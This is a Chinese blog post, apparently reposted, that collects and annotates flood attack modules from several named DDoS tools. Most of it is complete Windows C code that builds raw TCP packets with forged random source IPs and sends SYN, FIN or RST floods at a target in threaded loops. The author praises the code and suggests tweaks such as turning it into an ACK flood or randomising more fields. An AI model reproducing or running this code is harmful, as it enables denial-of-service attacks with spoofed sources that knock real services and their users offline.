对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇
来源:互联网 发布:上海美工培训班 编辑:程序博客网 时间:2024/06/05 05:20
对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇
//=================================================================================
飞龙 BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵
SYN洪水攻击
syn flood(SYN洪水攻击)介绍 http://hi.baidu.com/alalmn/blog/ ... 4fae00304e15e8.html
TcpHeader.th_flag = 2; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG //SYN 标志
我们可以不可以改变这个值 2是SYN攻击 改成16变成ACK攻击
这样可以吗
我刚才还在想这个问题 暴风DDOSVIP2010-225源代码.h 源码里就已经写到了呵呵爽啊
暴风DDOSVIP2010-225源代码.h SYN(流量) 我觉得写得非常好真的个人看法
QQ:316118740
//=================================================================================
冷风的.h
typedef struct tcphdr //定义TCP首部
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度+6位保留字中的4位
unsigned char th_flag; //2位保留字+6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;
typedef struct _iphdr //ip头
{
unsigned char h_verlen; //4位首部长度+4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间TTL
unsigned char proto; //8位协议号(TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
typedef struct tsd_hdr //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSD_HEADER;
//计算校验和
USHORT checksum(USHORT *buffer,int size)
{
unsigned long cksum=0;
while (size>1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if (size)
{
cksum+=*(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
/*********************SYN FLOOD**************************/
unsigned long CALLBACK SynFloodFunction(LPVOID dParam) //SYN攻击
{
SOCKET sendSocket; //套接字
SOCKADDR_IN Sin; //IP信息结构
IP_HEADER ipHeader;
TCP_HEADER tcpHeader;
PSD_HEADER psdHeader;
char szSendBuf[1024] = "";
if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) //创建一个与指定传送服务提供者捆绑的套接口
{ //INVALID_SOCKET发生错误
printf("Socket Setup Error...\n"); //插口设定错误…
return 0;
}
BOOL flag=1;
if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
{
printf("Setsockopt IP_HDRINCL Error...\n"); //Setsockopt IP_HDRINCL错误…
return 0;
}
int timeout = 3000;
if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
{
printf("Setsockopt SO_SNDTIMEO Error...\n"); //Setsockopt SO_SNDTIMEO错误…
return 0;
}
Sin.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
Sin.sin_port=htons(DdosPort); //目标端口号(使用网络字节顺序)
Sin.sin_addr.S_un.S_addr=resolve(DdosUrl); //目标IP地址
char src_ip[20] = {0};
while(!StopDDosAttack) //是否在攻击状态
{
wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); //格式化字符串 伪造IP
//填充IP首部
ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
ipHeader.tos = 0;
ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader)); //16位总长度(字节)
ipHeader.ident = 1; //16位标识
ipHeader.frag_and_flags = 0x40; //3位标志位
ipHeader.ttl = 128; //8位生存时间TTL
ipHeader.proto = IPPROTO_TCP; //8位协议(TCP,UDP…)
ipHeader.checksum = 0; //16位IP首部校验和
ipHeader.sourceIP = inet_addr(src_ip); //伪IP 伪装自己的IP
ipHeader.destIP = Sin.sin_addr.s_addr; //目标地址
//填充TCP首部
tcpHeader.th_sport = htons( 12121 ); //源端口号
tcpHeader.th_dport = htons( DdosPort ); //目标端口
tcpHeader.th_seq = htonl( rand()%900000000 + 1 ); //SYN序列号
tcpHeader.th_ack = 0; //ACK序列号置为0
tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0); //TCP长度和保留位
tcpHeader.th_flag = 0x02; //SYN 标志 //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
tcpHeader.th_win = htons(512); //窗口大小
tcpHeader.th_sum = 0; //校验
tcpHeader.th_urp = 0; //紧急数据偏移量
//填充TCP伪首部(用于计算校验和,并不真正发送)
psdHeader.saddr = ipHeader.sourceIP; //伪IP 伪装自己的IP
psdHeader.daddr = ipHeader.destIP; //目标地址
psdHeader.mbz = 0;
psdHeader.ptcl = IPPROTO_TCP; //协议类型
psdHeader.tcpl = htons(sizeof(tcpHeader)); //TCP长度
//计算TCP校验和
//计算TCP校验和,计算校验和时需要包括TCP pseudo header
memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );
//计算IP检验和
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
memset( szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), 0, 4 ); //内存空间初始化
ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) ); //填充发送缓冲区
memcpy( szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); //填充发送缓冲区
for(int a=0;a<100;a++) //每发送100个报文输出一个标示符.
{
sendto(sendSocket, szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin)); //发送TCP报文
//为什么没有写法返回状态呢
printf(".");
}
Sleep(100); //暂停(毫秒)
}
return 0;
}
//=================================================================================
暴风DDOSVIP2010-225源代码.h
//Fin(流量) 伪造RST协议(流量) 攻击模块为什么没有像 SYN(流量) 那样写呢 SYN(流量)写的真的很好
/*--------------------------------------IP与封报校验------------------------------------------*/
typedef struct _iphdr
{
unsigned char h_verlen; //4位手部长度,和4位IP版本号
unsigned char tos; //8位类型服务
unsigned short total_len; //16位总长度
unsigned short ident; //16位标志
unsigned short frag_and_flags; //类型
unsigned char ttl; //8位生存时间
unsigned char proto; //8位协议
unsigned short checksum; //ip首部效验和
unsigned int sourceIP; //伪造IP地址或本机
unsigned int destIP; //攻击的ip地址
}IP_HEADER, * PIP_HEADER;
/*--------------------------------------SYN data----------------------------------------------*/
typedef struct _tcphdr
{
unsigned short th_sport; //本机端口
unsigned short th_dport; //攻击的IP端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度
unsigned char th_flag; //6位标志位 ACK SYN and so on
unsigned short th_win; //16位窗口大小
unsigned short th_sum; //16位效验和
unsigned short th_urp; //16位紧急指针
}TCP_HEADER, * PTCP_HEADER;
typedef struct tsd_hdr
{
unsigned long saddr; //本机地址或伪造地址
unsigned long daddr; //目标地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSD_HEADER;
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
/*--------------------------------------------------------------------------------------*/
void finattack() //Fin(流量)
{
srand((unsigned) time(NULL));
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET SendSocket;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
PSD_HEADER psd_header;
char rawip[20]="192.168.1.244";
char SendBuff[100];
SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED );
if( SendSocket == INVALID_SOCKET )
return;
BOOL Flag = TRUE;
if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR )
return;
int Timeout = 5000;
if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR )
return;
SOCKADDR_IN Sin;
Sin.sin_family = AF_INET;
Sin.sin_port = tgtPort;
Sin.sin_addr.s_addr = inet_addr(tgtIP);
ip_header.h_verlen = (4<<4 | sizeof(ip_header)/sizeof(unsigned long));
ip_header.tos = 0;
ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header));
ip_header.ident = 1;
ip_header.frag_and_flags = 0x40;
ip_header.ttl = rand()%256;
ip_header.proto = IPPROTO_TCP;
ip_header.checksum = 0;
ip_header.sourceIP = inet_addr(rawip);
ip_header.destIP = inet_addr(tgtIP);
tcp_header.th_sport = htons( rand()%60000 + 1 );
tcp_header.th_dport = htons( tgtPort );
tcp_header.th_seq = htonl( rand()%900000000 + 1 );
tcp_header.th_ack = 0;
tcp_header.th_lenres = (sizeof(tcp_header)/4<<4|0);
tcp_header.th_flag = 0; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG 这个地方不一样
tcp_header.th_win = htons(512);
tcp_header.th_sum = 0;
tcp_header.th_urp = 0;
psd_header.saddr = ip_header.sourceIP;
psd_header.daddr = ip_header.destIP;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(tcp_header));
memcpy(SendBuff,&psd_header,sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header));
memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header));
memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4);
ip_header.checksum=checksum((USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header));
memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
while (1)
{
if (StopFlag == 1)
{
ExitThread(0);
return;
}
for(int a=0;a<1000;a++)
sendto(SendSocket, SendBuff, sizeof(ip_header) + sizeof(tcp_header), 0, (struct sockaddr *) &Sin, sizeof(Sin));
Sleep(SleepTime);
}
return;
}
/*--------------------------------------------------------------------------------------*/
void StartFIN(char ip[30],int port,int time,int xc) //Fin(流量)
{
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
port=tgtPort;
time=timeout;
if (StopFlag == -1)
return;
StopFlag=-1;
for(z=0;z<xc;z++)
{
h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)finattack, NULL, 0, NULL);
}
if(timeout!=0)
{
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}
/*--------------------------------------------------------------------------------------*/
void rstattack() //伪造RST协议(流量)
{
srand((unsigned) time(NULL));
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET SendSocket;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
PSD_HEADER psd_header;
char rawip[20]="192.168.1.244";
char SendBuff[100];
SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED );
if( SendSocket == INVALID_SOCKET )
return;
BOOL Flag = TRUE;
if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR )
return;
int Timeout = 5000;
if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR )
return;
SOCKADDR_IN Sin;
Sin.sin_family = AF_INET;
Sin.sin_port = tgtPort;
Sin.sin_addr.s_addr = inet_addr(tgtIP);
ip_header.h_verlen = (4<<4 | sizeof(ip_header)/sizeof(unsigned long));
ip_header.tos = 0;
ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header));
ip_header.ident = 1;
ip_header.frag_and_flags = 0x40;
ip_header.ttl = rand()%256;
ip_header.proto = IPPROTO_TCP;
ip_header.checksum = 0;
ip_header.sourceIP = inet_addr(rawip);
ip_header.destIP = inet_addr(tgtIP);
tcp_header.th_sport = htons( rand()%60000 + 1 );
tcp_header.th_dport = htons( tgtPort );
tcp_header.th_seq = htonl( rand()%900000000 + 1 );
tcp_header.th_ack = 0;
tcp_header.th_lenres = (sizeof(tcp_header)/4<<4|0);
tcp_header.th_flag = 4; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG 这个地方不一样
tcp_header.th_win = htons(512);
tcp_header.th_sum = 0;
tcp_header.th_urp = 0;
psd_header.saddr = ip_header.sourceIP;
psd_header.daddr = ip_header.destIP;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(tcp_header));
memcpy(SendBuff,&psd_header,sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header));
memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header));
memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4);
ip_header.checksum=checksum((USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header));
memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
while (1)
{
if (StopFlag == 1)
{
ExitThread(0);
return;
}
for(int a=0;a<10000;a++)
sendto(SendSocket, SendBuff, sizeof(ip_header) + sizeof(tcp_header), 0, (struct sockaddr *) &Sin, sizeof(Sin));
Sleep(SleepTime);
}
return;
}
/*--------------------------------------------------------------------------------------*/
void StartRST(char ip[30],int port,int time,int xc) //伪造RST协议(流量)
{
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
port=tgtPort;
time=timeout;
if (StopFlag == -1)
return;
StopFlag=-1;
for(z=0;z<xc;z++)
{
h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rstattack, NULL, 0, NULL);
}
if(timeout!=0)
{
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}
/*-------------------------------------------------------------------------------------------*/
void synattack() //SYN(流量)
{
srand((unsigned) time(NULL));
WSADATA wsaData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData); //确定SOCKET版本
SOCKET SendSocket;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
PSD_HEADER psd_header;
char rawip[20]="192.168.1.244"; //默认伪IP
char SendBuff[100];
SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); //创建一个与指定传送服务提供者捆绑的套接口
if( SendSocket == INVALID_SOCKET ) //INVALID_SOCKET发生错误
return;
BOOL Flag = TRUE;
if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR ) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
int Timeout = 5000;
if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR ) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
SOCKADDR_IN Sin; //IP信息结构
Sin.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
Sin.sin_port = tgtPort; //目标端口号(使用网络字节顺序)
Sin.sin_addr.s_addr = inet_addr(tgtIP); //目标IP地址
ip_header.h_verlen = (4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
ip_header.tos = 0;
ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header)); //16位总长度(字节)
ip_header.ident = 1; //16位标识
ip_header.frag_and_flags = 0x40; //3位标志位
ip_header.ttl = rand()%256; //8位生存时间TTL
ip_header.proto = IPPROTO_TCP; //8位协议(TCP,UDP…)
ip_header.checksum = 0; //16位IP首部校验和
ip_header.sourceIP = inet_addr(rawip); //伪IP 伪装自己的IP
ip_header.destIP = inet_addr(tgtIP); //目标地址
//填充TCP首部
tcp_header.th_sport = htons( rand()%60000 + 1 ); //源端口号 目标端口 随机产生呵呵很好很高很绝
tcp_header.th_dport = htons( tgtPort ); //目标端口
tcp_header.th_seq = htonl( rand()%900000000 + 1 ); //SYN序列号
tcp_header.th_ack = 0; //ACK序列号置为0
tcp_header.th_lenres = (sizeof(tcp_header)/4<<4|0); //TCP长度和保留位
tcp_header.th_flag = 2; //SYN 标志 //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
tcp_header.th_win = htons(512); //窗口大小
tcp_header.th_sum = 0; //校验
tcp_header.th_urp = 0; //紧急数据偏移量
//填充TCP伪首部(用于计算校验和,并不真正发送)
psd_header.saddr = ip_header.sourceIP; //伪IP 伪装自己的IP
psd_header.daddr = ip_header.destIP; //目标地址
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP; //协议类型
psd_header.tcpl = htons(sizeof(tcp_header)); //TCP长度
while (1)
{
if (StopFlag == 1) //判断攻击状态
{
ExitThread(0);
return;
}
for(int a=0;a<10240;a++)//发送10240个报文
{ //写的很好 伪IP 都在这个循环里 填充TCP上边已经做了 但是这个循环里又对随机动态信息进行了处理 写的很好太伟大了
wsprintf(rawip, "%d.%d.%d.%d",rand()%250+1,rand()%250+1,rand()%250+1,rand()%250+1); //格式化字符串 伪造IP
ip_header.checksum = 0;
ip_header.ttl = rand()%256; //8位生存时间TTL
ip_header.sourceIP = inet_addr(rawip); //伪IP 伪装自己的IP
tcp_header.th_sum = 0; //校验
tcp_header.th_sport = htons( rand()%60000 + 1 ); //源端口号 目标端口 随机产生呵呵很好很高很绝
tcp_header.th_seq = htonl( rand()%900000000 + 1 ); //SYN序列号
//应该把目标端口也加到这个里面
psd_header.saddr = ip_header.sourceIP; //伪IP 伪装自己的IP
memcpy(SendBuff,&psd_header,sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header));
memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header));
memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4);
ip_header.checksum=checksum((USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header));
memcpy(SendBuff,&ip_header,sizeof(ip_header)); //填充发送缓冲区
memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); //填充发送缓冲区
sendto(SendSocket, SendBuff, sizeof(ip_header) + sizeof(tcp_header), 0, (struct sockaddr *) &Sin, sizeof(Sin)); //发送TCP报文
//为什么没有写法返回状态呢
//这里写个返回状态更好了
}
Sleep(SleepTime);
}
return;
}
/*--------------------------------------------------------------------------------------*/
void StartSYN(char ip[30],int port,int time,int xc) //SYN(流量)
{
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
port=tgtPort;
time=timeout;
if (StopFlag == -1)
return;
StopFlag=-1;
for(z=0;z<xc;z++)
{
h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)synattack, NULL, 0, NULL);
}
if(timeout!=0)
{
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}
//=================================================================================
盘古DDOS优化版源码.h
///攻击函数
//SYN
void synflood()
{
BOOL flag=TRUE;
int time=5000;
char src_ip[20]="192.168.0.1";
WSAData wsadata; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2),&wsadata); //确定SOCKET版本
SOCKET synSock;
SOCKADDR_IN synaddr; //IP信息结构
IPHEADER ipheader;
TCPHEADER tcpheader;
TSDHEADER psdheader;
synSock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if(synSock==INVALID_SOCKET) //INVALID_SOCKET发生错误
return;
if(setsockopt(synSock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
if(setsockopt(synSock,SOL_SOCKET,SO_SNDTIMEO,(char*)&time,sizeof(time))==SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
synaddr.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
synaddr.sin_port = htons(tgtport); //目标端口号(使用网络字节顺序)
synaddr.sin_addr.S_un.S_addr = inet_addr(tgtip); //目标IP地址
wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); //格式化字符串 伪造IP
//填充IP首部
ipheader.h_verlen = (4<<4 | sizeof(ipheader)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
ipheader.tos = 0;
ipheader.total_len = htons(sizeof(ipheader)+sizeof(tcpheader)); //16位总长度(字节)
ipheader.ident = 1; //16位标识
ipheader.frag_and_flags = 0; //3位标志位
ipheader.ttl = 128; //8位生存时间TTL
ipheader.proto = IPPROTO_TCP; //8位协议(TCP,UDP…)
ipheader.checksum = 0; //16位IP首部校验和
ipheader.SourceIP = inet_addr(src_ip); //伪IP 伪装自己的IP
ipheader.DestIP = inet_addr(tgtip); //目标地址
//填充TCP首部
tcpheader.th_sport = htons(5444);//源端口号
tcpheader.th_dport = htons(tgtport); //目标端口
tcpheader.th_seq = htonl(0x12345678); //SYN序列号
tcpheader.th_ack = 0; //ACK序列号置为0
tcpheader.th_lenres = (sizeof(tcpheader)/4<<4|0); //TCP长度和保留位
tcpheader.th_flag = 2; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG //SYN 标志
tcpheader.th_win = htons(512); //窗口大小
tcpheader.th_sum = 0; //校验
tcpheader.th_urp = 0; //紧急数据偏移量
//填充TCP伪首部(用于计算校验和,并不真正发送)
psdheader.saddr = ipheader.SourceIP; //伪IP 伪装自己的IP
psdheader.daddr = ipheader.DestIP; //目标地址
psdheader.mbz = 0;
psdheader.ptcl = IPPROTO_TCP; //协议类型
psdheader.tcpl = htons(sizeof(tcpheader)); //TCP长度
//计算校验和
char SendBuff[100]={0};
memcpy(SendBuff, &psdheader, sizeof(psdheader));
memcpy(SendBuff+sizeof(psdheader), &tcpheader, sizeof(tcpheader));
tcpheader.th_sum=checksum((USHORT *)SendBuff,sizeof(psdheader)+sizeof(tcpheader));
memcpy(SendBuff, &ipheader, sizeof(ipheader)); //填充发送缓冲区
memcpy(SendBuff+sizeof(ipheader), &tcpheader, sizeof(tcpheader)); //填充发送缓冲区
while(1)
{
if(Stop==1) //是否在攻击状态
{
ExitThread(0);
return;
}
for(int i=0;i<10000;i++)
sendto(synSock,SendBuff,sizeof(ipheader)+sizeof(tcpheader),0,(struct sockaddr*)&synaddr,sizeof(synaddr)); //发送TCP报文
Sleep(20);
}
closesocket(synSock); //关闭SOCKET
WSACleanup(); //中止Windows Sockets DLL的使用
}
//=================================================================================
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----CC篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----CC篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----GET篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----ICMP篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----UDP篇
- 对现有的所能找到个DDOS代码(攻击模块)做出一次分析----TCP篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----自定义攻击篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----其他(攻击方式)篇
- SYN攻击(DDOS攻击的一种)
- SYN攻击(DDOS攻击的一种)
- DDOS攻击原理,及通过iptables预防syn洪水攻击
- 一个SYN攻击的代码分析
- 一个SYN攻击的代码分析
- Syn反射洪水攻击
- SYN 洪水攻击
- 防止SYN洪水攻击
- SYN洪水攻击
- SecureCRT 绝佳配色方案, 保护你的眼睛
- Web服务器面临的五种应用层DOS威胁
- Scala深入浅出进阶经典 第82讲:Scala中List的ListBuffer是如何实现高效的遍历计算的
- 加快vs2010的解决办法
- JavaScript高级程序设计之面向对象的程序设计之创建对象之寄生构造函数模式 第6.2.6讲笔记
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇
- object-c结构体赋值
- Android设置全局字体大小解决方案
- JAVA入门知识汇总
- 修改11—1的程序编程instanceof
- 《数据管理技术和理论》随堂笔记
- Scala深入浅出进阶经典 第83讲:Scala中List的实现内幕源码揭秘
- C#调用Matlab生成的dll方法的详细说明_C#教程
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----CC篇
